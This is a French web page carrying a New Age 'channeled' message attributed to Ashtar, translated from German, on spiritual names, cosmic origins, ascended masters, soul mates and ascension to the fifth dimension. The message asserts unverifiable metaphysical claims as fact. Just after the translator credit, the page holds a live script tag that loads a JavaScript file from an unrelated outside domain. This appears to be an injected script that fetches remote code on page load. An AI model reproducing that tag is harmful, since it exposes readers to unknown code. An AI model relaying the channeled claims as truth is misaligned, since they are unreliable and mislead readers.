• ashtar sheran
    MESSAGES CANALISÉS PAR STERNENKRAFT
     
    Abandonnez tous les « concepts »
    5 Avril 2014
     
    Abandonnez tous les conceptsSoyez salués, chers frères et sœurs, Je Suis Ashtar et je m’incline devant la Lumière divine en vous qui, de jour en jour, commence à briller de plus en plus fort.

    Chers amis, vous vous trouvez dans une phase extrêmement intéressante de votre processus d’ascension et de très nombreuses questions nous arrivent en ce moment. On pourrait dire qu’il y a un aspect principal de l’évènement autour duquel se centrent actuellement toutes les questions – cet aspect principal est la question des questions et elle s’énonce :
    • Qui suis-je ?
    • Quel est le nom de mon d’âme ?
    • Quelle est ma planète d’origine ?
    • Quel est mon lien avec tel ou tel Maître ?
    • Qui est mon âme sœur et comment puis-je la trouver ?
    Toutes ces question trouvent leur origine dans une seule question : Qui suis-je ? Vous essayez donc de trouver des « points de repère » qui peuvent vous aider à trouver une réponse à ces questions. Mais vous cherchez ces points de repère sous une forme qui vous est habituelle du point de vue de l’expérience physique – vous utilisez des concepts 3-dimensionnels, et là se trouve déjà le premier problème sur lequel vous semblez buter lorsque vous cherchez des réponses à ces questions. Prenons, par exemple, le nom spirituel. Le nom spirituel est une composition de votre fréquence originale, de vos expériences, de couleurs, de schémas et de vibrations sonores. Le nom spirituel est très complexe et en même temps tellement beau, qu’en réalité il est impossible de l’exprimer dans le langage tridimensionnel qu’utilise l’être humain. Il vous est toutefois possible de connaître votre nom spirituel en faisant appel à votre Soi supérieur et ensuite écouter, ressentir et observer ce qui se passe.

    Permettez-vous de fusionner avec votre Soi supérieur, et lorsque vous vous êtes totalement fondu dans cette expérience magnifique, alors donnez un nom à cette expérience – un nom qui, à tout moment, vous rappelle à nouveau cette expérience de fusion avec votre Soi supérieur. Personne, en dehors de vous-même, ne peut vous donner ce nom. Personne ne peut canaliser ce nom pour vous ; il n’y a pas de système pour calculer, à l’aide de votre nom et de votre date de naissance, votre nom spirituel, et il n’est pas non plus nécessaire d’avoir des aptitudes de clairvoyance ou de clairaudience pour pouvoir recevoir ce nom. Votre intention seule suffit pour vous relier à l’énergie grandiose de votre Soi supérieur, et ensuite permettre cette expérience. Il se peut que vous entendiez des sons, il se peut que non ; il se peut que vous voyiez des couleurs, il se peut que non ; il se peut que vous voyez des images magnifiques qui réjouissent votre cœur – tout est possible, mais rien n’est obligatoire – cela dépend de l’éveil de vos sens subtils. Donnez un nom à cette expérience sans pareil. Et chaque fois que vous faites appel à ce nom, il vous rappellera ce contact et le rétablira. De cette façon, vous pouvez travailler avec votre nom spirituel, même si le nom spirituel véritable ne peut jamais être exprimé dans une expérience de la densité physique. Et – il se peut même que votre nom spirituel se modifie au cours de votre processus. Tout simplement lorsque vous découvrez d’autres aspects de votre Soi supérieur que vous étiez peut-être incapable de percevoir il y a un an. Subitement, le nom, que vous vous êtes donné jadis, ne vous semble plus juste et alors vous pouvez le changer. Le nom de ShaNiraa s’est également transformé au cours de son processus, mais elle a gardé le nom ShaNiraa afin d’éviter une trop grande confusion à l’extérieur. Tout est permis, chers amis !

    Abordons maintenant une autre question qui préoccupe actuellement de nombreuses Semences d’Étoiles. La question de la planète d’origine. D’abord, je dois dire que planète d’origine n’est au fond pas la bonne expression pour ce que vous cherchez, parce que vous êtes une partie de tout ce qui EST, et vous êtes donc chez vous dans tout ce qui EST. Donc, si vous posez la question de votre planète d’origine, la réponse correcte serait – la Terre. Car, pour l’instant, c’est la Terre qui est votre lieu d’origine mais, bien évidemment, ce n’est pas cela que vous désirez savoir. Il s’agit de vos souvenirs, des lieux où vous avez déjà été ou de ce que j’aimerais appeler la planète d’origine énergétique. Donc la planète où, au sein de cet univers, vous avez été incarné pour la première fois, que ce soit dans un corps physique, subtil ou éthérique.

    Ceux que nous appelons des Semences d’Étoiles ont déjà fait des expériences dans la densité physique sur d’autres planètes. Les expériences de la plupart des personnes étaient plutôt de nature subtile et éthérique. Mais vous êtes pour ainsi dire tous des « extraterrestres ». Chez les semences d’étoiles, il y a une planète à laquelle vous vous sentez particulièrement reliés parce que c’est là que vous avez fait, soit les premières expériences, soit une expérience particulièrement intense, soit votre expérience dans la densité de l’oubli. Ou bien vous vous sentez particulièrement liés à une planète parce que votre famille cosmique y vit actuellement et qu’à partir de là elle travaille avec vous. Tout cela n’a, au sens propre, rien à voir avec le mot planète d’origine. Car notre patrie à tous est la Source de tout ce qui EST. Donc, lorsque vous demandez à l’Univers de vous montrer votre planète d’origine et que vous ne recevez pas de réponse, ce n’est pas que l’Univers ne vous répond pas, mais c’est que vous posez la « mauvaise » question par rapport à ce que vous désirez savoir. Désirez-vous savoir où séjourne actuellement votre famille cosmique ? Alors poser précisément cette question. Il est tout à fait possible qu’on vous montre alors un vaisseau de lumière – une de ces villes de Lumière gigantesques qui voyagent à travers l’Univers – et que cette image déclenche en vous un sentiment d’appartenance parce que, là, vous pouvez sentir l’énergie de vos parents cosmiques. Ou bien désirez-vous savoir sur quelle planète vous avez fait vos premières expériences ? Il se peut que vous voyiez un lieu magnifique mais que, néanmoins, aucun sentiment franc d’appartenance ne se déclenche en vous parce vous avez clôturé et intégré cette expérience depuis longtemps. Beaucoup pensent effectivement que la planète, d’où vous êtes venus et où vous retournerez après votre ascension, existe. Mais la Source continue à se développer constamment, chers amis, et vous êtes une part de ce développement. Vous ne retournerez pas là d’où vous êtes venus, au contraire, vous évoluerez dans des expériences encore plus magnifiques. Il est évidemment possible que, avant votre expérience sur la Terre, vous ayez servi à l’endroit que vous désignez comme vaisseaux de Lumière et que vous y retournerez après votre expérience sur la Terre. Cependant, ce ne sera plus comme avant car vous vous serez transformés !

    Vous voyez que dans les dimensions plus subtiles vous ne savez pas faire usage des concepts que vous utilisez sur la Terre. Le mot patrie, dans le sens qu’on lui donne sur la Terre, n’existe pas chez nous parce que nous nous sentons partout chez nous. C’est aussi le problème que nous rencontrons lorsque nous parlons à travers vos « channel » médiums. Beaucoup de concepts de votre langue sont trop rigides, voire trop simples, pour notre mode de communication. Dans votre langage il y a des mots qui ont une toute autre signification chez nous. D’autre part, pour un de vos mots, nous avons 100 fois plus d’expressions. Par exemple, le mot « amour ». L’amour est si complexe que dans la 5ème dimension, il y a vraiment 100 fois plus d’expressions pour ce mot.

    Et ce qui vaut pour le nom spirituel, vaut également pour la « planète d’origine » – vous devez abandonner vos concepts humains pour obtenir les réponses auxquelles vous aspirez tant. Oui, le temps est venu pour obtenir ces réponses, sinon il n’y aurait pas tant de personnes qui se posent ces questions en ce moment.

    Abordons maintenant la question suivante. Une question à laquelle il est extrêmement difficile de répondre avec des mots humains.

    Quelle est ma relation avec quel Maître ?

    Il y a ce que vous appelez des « aspects » et qui provoquent beaucoup de confusions et de nombreuses opinions différentes parmi vous. Que signifie être un aspect de telle Entité ou de tel Maître ?

    Comprenez, chers amis, qu’il existe de très nombreuses dimensions, niveaux et couches dans tout ce qui EST, et que tous se chevauchent pour ainsi dire, tout en existant en même temps côte à côte ou plus précisément l’un dans l’autre.

    Parlons maintenant de la conscience : la conscience est divisible à l’infini et en même temps unie. En réalité, il n’y a qu’une conscience – JE SUIS – la Source. Mais vous aussi, vous êtes des parties de cette Source et, par conséquent, vous avez également cette conscience JE SUIS. Cette conscience unique s’est divisée en d’innombrables parties afin qu’elle puisse s’expérimenter elle-même. Les parties de cette conscience unique ont commencé à accumuler des expériences et se sont donc – on pourrait dire – individualisées. Des âmes individuelles sont nées, qui sont des parties de cette conscience Une JE SUIS. Ici, j’aimerais m’arrêter un instant car, ici aussi, de nombreux malentendus existent entre vous. Il y a ceux qui affirment qu’en réalité il n’y a qu’une âme et que cette âme est Dieu. D’autres, par contre, disent qu’il y a de très nombreuses âmes. Ici nous avons de nouveau le problème des concepts. Ce n’est pas parce que quelqu’un utilise la notion d’âme pour désigner la conscience TOUT-UNE qu’il a tort, uniquement parce qu’il a utilisé une notion que vous n’utiliserez pas dans ce cas – comprenez-vous ? Tant que vous restez attachés à des concepts, il y aura des malentendus par rapport à des vérités des dimensions subtiles. Apprenez à sentir ce que votre vis-à-vis veut dire, alors vous percevrez de quoi il parle réellement. Dans les niveaux subtils, ces malentendus n’existent plus parce que nous n’utilisons pas un langage basé sur des mots, mais nous communiquons sous forme d’images et de sentiments. Ainsi chacun sait ce que l’autre veut dire.

    Maintenant je viens à un point de mes explications qui n’est pas du tout facile à comprendre, prenez donc votre temps pour lire ce paragraphe :

    En tant que conscience, vous êtes également divisible à l’infini. Et, au sein des 3ème et 4ème dimensions, vous avez déjà divisé plusieurs fois cette conscience. À plusieurs reprises, on vous a dit que le temps linéaire, tel que vous le connaissez, est une illusion et que vous vivez toutes vos vies antérieures pour ainsi dire simultanément. Au cours du processus d’ascension vous commencez de nouveau à fusionner avec ces vies antérieurs et aussi avec tous vos Sois dans la 4ème dimension. Il se peut que vous fassiez en même temps des expériences sur d’autres planètes de la 4ème dimension. Le niveau astrale ou le « royaume des morts » se trouve dans la 4ème dimension. Très souvent vous vous étonnez que nous parlons d’une ascension dans la 5ème dimension et vous vous demandez pourquoi vous « sautez » apparemment la 4ème dimension. Chers amis, acceptez qu’on vous dise – vous ne sautez aucune dimension – vous existez simultanément dans la 3ème et la 4ème dimension. Tous ces Sois fusionnent peu à peu en une conscience et se connectent avec le Soi subtil immédiatement supérieur dans la 5ème dimension. C’est cela l’ascension. Et absolument rien ne se perd lors de ce processus – tout au contraire – vous grandissez et votre conscience s’accroît. Et ce n’est qu’une ascension parmi beaucoup. Lorsque vous vous serez lassés des expériences dans la 5ème dimension, tout comme vous l’êtes actuellement des expériences physiques, alors vous rassemblerez à nouveau vos Sois et monterez à un niveau « plus haut » et cela jusqu’à ce que vous soyez à nouveau Un avec la conscience Toute-Une ou avec la conscience JE SUIS de la Source. Et alors commence un nouveau cycle, mais tout cela est encore dans un avenir très lointain, pour le formuler dans vos notions du temps. Pour le moment il s’agit de l’ascension dans la 5ème dimension. Il y a encore davantage à dire par rapport à l’ascension, mais ce sera pour plus tard.

    Un Maître ascensionné a pour ainsi dire rassemblé tous ses Sois dans la 3ème et 4ème dimension et a ascensionné dans la 5ème dimension. Il n’y a plus d’aspects partiels de lui, sauf s’il le choisit afin d’aider la Terre, comme l’a fait Sananda jadis. Mais il peut laisser fusionner une toute petite partie de la conscience de son Soi avec votre conscience dans le but de vous aider, vous, et la Terre. Cette toute petite part de la conscience contient toutes les expériences de ce Maître ascensionné et il est tout à fait possible qu’une personne sur la Terre pense se souvenir avoir été Jésus. Ce processus se passe toujours avec l’accord du Soi supérieur de la personne concernée afin de servir le Grand Tout. Dans le cas de Jésus, il se peut que l’amour envers Lady Nada soit également perçu et alors la personne concernée pense que Lady Nada est son âme sœur. Ce sentiment amoureux pour Lady Nada peut être tellement fort que cette personne n’accepterait aucune autre âme sœur. Dans certains de ces cas, cela a aussi quelque chose à voir avec l’ego humain, mais ce n’est pas forcément le cas. Si c’est le cas, alors la véritable âme sœur de cette personne se montrera toujours en association avec Lady Nada. Car, comme déjà dit – la conscience n’est au fond pas séparée l’une de l’autre et une telle situation est donc tout à fait possible.

    Dans les niveaux plus subtils vous pouvez expérimenter l’unité et l’individualité simultanément – mais cela n’est pas concevable pour l’entendement humain et entraîne donc souvent des confusions à votre niveau. Mais permettez-moi de vous dire que la vérité est en tout cas plus grandiose et magnifique que vous ne pouvez l’imaginer à présent. Il n’y a rien qui doive vous faire peur. De quoi avez-vous peur ? Pensez-vous que le monde spirituel se moquera de vous lorsque, après l’ascension, vous apprenez que vous n’avez pas été Jésus ? Cela n’arrivera pas car nous connaissons la nature de la conscience. Pensez-vous être déçus si vous apprenez que Lady Nada n’est pas votre âme sœur – un peu comme c’est le cas sur la Terre lorsqu’un amour est repoussé ? Cela n’arrivera pas, vous reconnaîtrez en un instant pourquoi vous avez ressenti cela, vous allez reconnaître votre âme sœur et ressentir un tel bonheur que vous ne songerez plus du tout à ce que vous n’avez pas discerné il y a peu de temps. Oui, et là nous arrivons déjà au thème suivant : la question de l’âme sœur.

    Ici aussi, nous rencontrons à nouveau le problème des concepts. L’un parle de l’âme sœur alors qu’en réalité il s’agit pour lui de la part interne du sexe opposé. Un autre parle de l’âme duale, alors qu’en réalité il s’agit pour lui de l’âme sœur, donc de cette âme qui ressemble à la vôtre en ce qui concerne sa fréquence, son énergie. Il y a tant de points de vue au sein de l’expérience de l’individualité, qu’il est réellement difficile de discerner de quoi on parle, sauf si vous écoutez au-delà des mots et que vous n’exigez plus que telle notion doive absolument être employée dans tel cas. On pourrait vraiment dire qu’au sein de la Source, vous êtes tous des âmes sœur. Cela dépend toujours de quel niveau, de quelle dimension vous parlez. Je pourrais maintenant vous dire que même les notions de dimension et de niveau ne correspondent pas réellement au sujet dont je vous parle ici, mais je pense que ce serait vraiment trop pour aujourd’hui.

    Cette autre part du sexe opposé en vous existe, mais si je parle maintenant de votre niveau alors je peux dire que vous êtes vous-mêmes cette part. Sinon, comment auriez-vous pu, dans vos différentes incarnations, expérimenter non seulement en tant que masculin, mais aussi en tant que féminin ? Autrement, vous vous serez toujours incarné dans le même sexe, ce qui n’est évidemment pas le cas. Votre Soi supérieur est androgyne. Ceci ne veut pas dire qu’après l’ascension vous allez perdre votre sexe. Dans la 5ème dimension, vous pouvez vous exprimer dans un corps masculin ou féminin, mais en votre for intérieur vous aurez à nouveau acquis votre état d’androgyne. Votre âme sœur est également androgyne. Tout comme le mot jumeau [Ndt : en allemand âme sœur se dit Zwillingseele, âme jumelle, d’où la référence au jumeau] le laisse supposer, votre âme sœur vous est seulement très, très ressemblant dans sa fréquence, ou autrement dit, dans son individualité. A un niveau encore plus subtil, votre conscience est UNE. Ainsi vous apprenez, consciemment ou inconsciemment, tout ce que votre âme sœur vit et vice versa. Peu importe que votre âme sœur soit incarnée sur la Terre ou qu’elle fasse ses expériences ailleurs. C’est le cas pour la plupart des Semences d’Étoiles, l’âme sœur n’est pas incarnée sur la Terre. Il est même possible que l’âme sœur ait déjà atteint le stade de Maître ascensionné. Mais vous ne connaissez pas tous les noms des Maîtres ascensionnés – vous n’en connaissez qu’une toute petite partie. Lorsqu’on vous dit que vous et votre âme sœur êtes une entité, c’est tout à fait correcte – cela dépend de quel niveau d’expériences vous observez ceci. Comme déjà dit – en fin de compte, nous sommes tous Un, mais il y a de très nombreux niveaux entre l’expérience de l’être humain sur la Terre et l’expérience de la conscience d’Unité avec la Source. Beaucoup rêvent de pouvoir rencontrer leur âme sœur et puis ils lisent qu’ils sont eux-mêmes cette âme sœur, alors ils éprouvent un sentiment de déception en pensant qu’ils ne pourront jamais vivre cette rencontre. Laissez-moi vous dire que tout ce dont vous rêvez est possible. Vous ne pourriez pas l’imaginer si ce n’était pas possible au sein de l’expérience de la Source. La Source, Père-Mère-Dieu, n’a aucun « intérêt » à vous décevoir car la Source est tout à fait consciente qu’elle se décevra elle-même. Le désir de faire cette expérience est UN avec le désir de la Source de s’expérimenter dans toutes les variantes possibles.

    Donc, si vous voulez déjà faire l’expérience du contact avec votre âme sœur maintenant, dans la 3ème, 4ème dimension, alors demandez-le tout simplement et ne vous accrochez pas à des concepts tels que les noms. Le nom n’est pas déterminant pour l’expérience en soi. Demandez de pouvoir sentir l’amour et la présence de votre âme sœur et ensuite laissez tout simplement faire. L’instant où vous serez face à face dans la 5ème dimension est tout proche, mais vous pouvez déjà ressentir l’énergie ici et maintenant et c’est même utile pour accélérer le processus dans lequel vous vous trouvez actuellement.

    Cela nous amène de nouveau au processus d’ascension, et pour terminer j’aimerais encore vous dire quelque chose à ce propos.

    Pour beaucoup, le processus d’ascension individuel à lieu actuellement. Il y a une ascension individuelle, globale ou planétaire, il y a l’ascension d’un système solaire, d’une galaxie ou encore l’ascension cosmique d’un Univers entier.

    L’ascension planétaire de Gaïa progresse, mais certains parmi vous font le chemin – on pourrait dire – un peu plus « rapidement » et il est par conséquent tout à fait possible que ce groupe ascensionne avant l’ascension planétaire. Et comme votre Terre se trouve également dans son processus d’ascension, il est tout à fait possible pour ce groupe de continuer à rester sur la Terre, de passer d’une dimension à l’autre et de continuer à soutenir l’humanité. Cela semble trop fantastique pour être vrai, et pourtant c’est ce que certains vivent actuellement. Les quelques-uns qui se trouvent dans ce processus individuel cherchent peut-être désespérément des channelings qui pourraient leur confirmer qu’il est tout à fait possible d’ascensionner avant l’ascension planétaire. Mais très peu de messages en parlent. Tout simplement parce que les channelings sont en grande partie écrits pour ceux qui commencent à s’éveiller et cherchent des réponses. Bien évidemment qu’une ascension individuelle est possible – sinon comment aurait-ce été possible pour Bouddha, Jésus, Sérapis, St. Germain et tous les autres Maîtres ascensionnés ? Et au cours d’un processus d’ascension globale, cela est tout à fait possible pour un groupe plus grand. Vos anciennes Écritures en parlent. Prenez un peu les phrases qui parlent du ravissement dans l’Apocalypse de Jean. Là, quelques-uns quittent la planète bien avant la grande purification et cela n’a rien à voir avec une évacuation, même si on pourrait l’interpréter ainsi.

    Il s’agit en premier lieu d’élever vos vibrations de telle manière qu’il vous est possible de « switcher » d’une dimension à une autre. Oui – beaucoup se trouvent dans ce processus.

    Le nom de l’âme, les souvenirs de votre voyage jusqu’ici et aussi le contact avec votre âme sœur, peuvent vous soutenir dans ce processus, pour autant que vous vous le décidez. Pour cela, il n’est pas nécessaire de vous souvenir du nom des planètes, des âmes sœur etc. – il n’est pas non plus nécessaire de trouver le mot exact pour cela – car peu à peu, les concepts sous forme de mots vous limitent de plus en plus. Il s’agit de vos sentiments. Permettez à vos sens plus subtils d’enfin s’éveiller. Le moment venu, ils vont fusionner avec vos sens physiques, et alors vous pouvez réellement nous voir, nous toucher et vous pouvez, dans les niveaux plus subtils, serrer à nouveau dans vos bras tous vos êtres chers.

    Chers amis, je termine ce message car il contient vraiment beaucoup d’informations. Sentez l’énergie qu’il contient et n’essayez pas de trop « intellectualiser » les mots. Car, comme si souvent, je n’avais à ma disposition que des mots très limités et rien que lire ces mots ne vous serait pas utile dans ce cas-ci. La vérité est beaucoup plus grande qu’il n’est possible de l’exprimer avec des mots humains ! Si vous voulez comprendre les niveaux plus subtils, alors abandonnez tous les concepts du langage humain et de la pensée humaine. Parce que ce n’est vraiment pas possible autrement !

    Soyez bénis chers frères et sœurs.
    Ashtar


    Traduit de l’Allemand par Sophia
    Le texte original se trouve en allemand sur : sternenkraft.at
    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

    votre commentaire


    Suivre le flux RSS des articles de cette rubrique
    Suivre le flux RSS des commentaires de cette rubrique